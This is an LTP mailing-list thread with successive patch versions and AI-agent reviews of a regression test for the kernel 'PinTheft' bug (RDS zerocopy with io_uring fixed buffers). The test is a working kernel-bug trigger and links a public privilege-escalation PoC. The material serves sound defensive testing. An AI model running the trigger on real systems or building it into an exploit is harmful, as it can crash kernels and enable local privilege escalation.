+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
@ 2026-05-23 13:30 ` linuxtestproject.agent
0 siblings, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 13:30 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, May 23, 2026, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
[...]
> +/* io_uring IORING_REGISTER_CLONE_BUFFERS argument. */
> +struct clone_buffers_arg {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
This struct is a kernel API type and belongs in `include/lapi/io_uring.h`
alongside `IORING_REGISTER_CLONE_BUFFERS`, following the existing pattern
of `struct io_uring_files_update` living next to `IORING_REGISTER_FILES_UPDATE`.
> +#ifndef IORING_REGISTER_CLONE_BUFFERS
> +#define IORING_REGISTER_CLONE_BUFFERS 30
> +#endif
The value 30 needs a cross-reference to the upstream kernel uapi header
(`include/uapi/linux/io_uring.h`) in a comment or at least a verification
note. The lapi file has no other numbered register opcodes above 10, so
there is nothing here to corroborate the value. Please confirm against the
kernel source — the latest stable (7.1) has this defined; a quick grep of
`linux/io_uring.h` is enough.
> + if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1)) {
> + if (errno == ENOMEM)
> + tst_brk(TCONF, "Not enough memory to register io_uring buffer");
ENOMEM is a resource exhaustion error, not a configuration or feature
availability issue. Use `TBROK | TERRNO` here (or simply drop the special
case and let the fallthrough handle it), not `TCONF`.
[...]
> +#define CLEANUP_WAIT_SECS 30
The test unconditionally sleeps 30 s on every non-vulnerable pass. No
`.timeout` is set; the default 300 s window is large enough, but a
`.timeout = 60` (or similar) would make the intent explicit and prevent
runtest timeouts if setup overhead is higher than expected.
---
Note:
Our agent completed the review of the patch. The full review can be
found at: https://github.com/linux-test-project/ltp/pull/1726
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment on this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v3] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
@ 2026-05-23 15:10 ` Sebastian Chlad
2026-05-23 16:17 ` [LTP] " linuxtestproject.agent
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
3 siblings, 1 reply; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 15:10 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v3: (follow-up on the LTP-AI suggestions)
- Move struct clone_buffers_arg to lapi/io_uring.h as io_uring_clone_buffers_arg
- Add source reference comment for IORING_REGISTER_CLONE_BUFFERS value
- Add RDS_CMSG_ZCOPY_COOKIE fallback for older userspace headers
- Fix ENOMEM case: use TBROK instead of TCONF for IORING_REGISTER_BUFFERS
- Add .timeout = 60 to account for 30s cleanup wait
include/lapi/io_uring.h | 14 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 425 ++++++++++++++++++
3 files changed, 440 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..6f13b8466 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,20 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+#define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
+/* Argument for IORING_REGISTER_CLONE_BUFFERS */
+#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS_ARG
+struct io_uring_clone_buffers_arg {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..32a0f237d 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..e7c05cb43
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,425 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+/* Fallback for older userspace headers (e.g. openSUSE Leap 42.2). */
+#ifndef RDS_CMSG_ZCOPY_COOKIE
+#define RDS_CMSG_ZCOPY_COOKIE 12
+#endif
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct io_uring_clone_buffers_arg clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, &params);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(&params, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, &params);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .timeout = 60,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
@ 2026-05-23 16:17 ` linuxtestproject.agent
0 siblings, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 16:17 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, 23 May 2026 17:10:45 +0200, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
> Author: Sebastian Chlad <sebastianchlad@gmail.com>
> Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
Author email and Signed-off-by email don't match. The DCO requires the
SOB identity to match the commit author. Please rebase with a consistent
identity (likely the corporate address throughout, or vice versa).
[...]
> +/* Argument for IORING_REGISTER_CLONE_BUFFERS */
> +#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS_ARG
> +struct io_uring_clone_buffers_arg {
> + uint32_t src_fd;
> + uint32_t flags;
> + uint32_t pad[6];
> +};
> +#endif
The HAVE_STRUCT_IO_URING_CLONE_BUFFERS_ARG guard is never set because
there is no corresponding AC_CHECK_TYPES entry in configure.ac. See e.g.
the struct futex_waitv pattern:
AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
Without it the guard is dead and on a kernel that defines this struct
under the same name you'll get a redefinition error. Please add:
AC_CHECK_TYPES([struct io_uring_clone_buffers_arg],,,
[#include <linux/io_uring.h>])
Also: the upstream kernel uapi defines this as struct io_uring_clone_buffers
(no _arg suffix). If that is still the name in 7.1, the struct name and
guard in lapi need to match (io_uring_clone_buffers /
HAVE_STRUCT_IO_URING_CLONE_BUFFERS) so the fallback fires correctly on
older headers and doesn't shadow the system definition on newer ones. ⚠️
Please verify against the 7.1 uapi header.
[...]
> +#define GUP_PIN_COUNTING_BIAS 1024
> +
> +
> +static int ring_fd1 = -1;
Double blank line. One blank line between a macro block and the variable
declarations is enough.
[...]
---
Note:
Our agent completed the review of the patch. The full review can be
found at: (not set)
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment on this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v4] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
` (2 preceding siblings ...)
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
@ 2026-05-23 16:57 ` Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
` (2 more replies)
3 siblings, 3 replies; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 16:57 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
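v4: (addressing the points raised by the LTP AI reviewer)
- Fix double blank line
- Rename the lapi fallback struct to io_uring_clone_buffers (the kernel
  uapi name) and add the matching AC_CHECK_TYPES entry to configure.ac so
  that HAVE_STRUCT_IO_URING_CLONE_BUFFERS is actually defined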
configure.ac | 1 +
include/lapi/io_uring.h | 14 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 424 ++++++++++++++++++
4 files changed, 440 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/configure.ac b/configure.ac
index 0653d7793..3a1283ac3 100644
--- a/configure.ac
+++ b/configure.ac
@@ -255,6 +255,7 @@ AC_CHECK_TYPES([struct __kernel_old_timeval, struct __kernel_old_timespec, struc
struct __kernel_old_itimerval],,,[#include <sys/socket.h>])
AC_CHECK_TYPES([struct futex_waitv],,,[#include <linux/futex.h>])
+AC_CHECK_TYPES([struct io_uring_clone_buffers],,,[#include <linux/io_uring.h>])
AC_CHECK_TYPES([struct mount_attr],,,[
#ifdef HAVE_MOUNT_SETATTR
# include <sys/mount.h>
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..5c6f9a785 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,20 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+/* linux/io_uring.h: IORING_REGISTER_CLONE_BUFFERS = 30 */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+#define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
+/* Argument for IORING_REGISTER_CLONE_BUFFERS */
+#ifndef HAVE_STRUCT_IO_URING_CLONE_BUFFERS
+struct io_uring_clone_buffers {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..32a0f237d 100644
--- a/runtest/cve
+++ b/runtest/cve
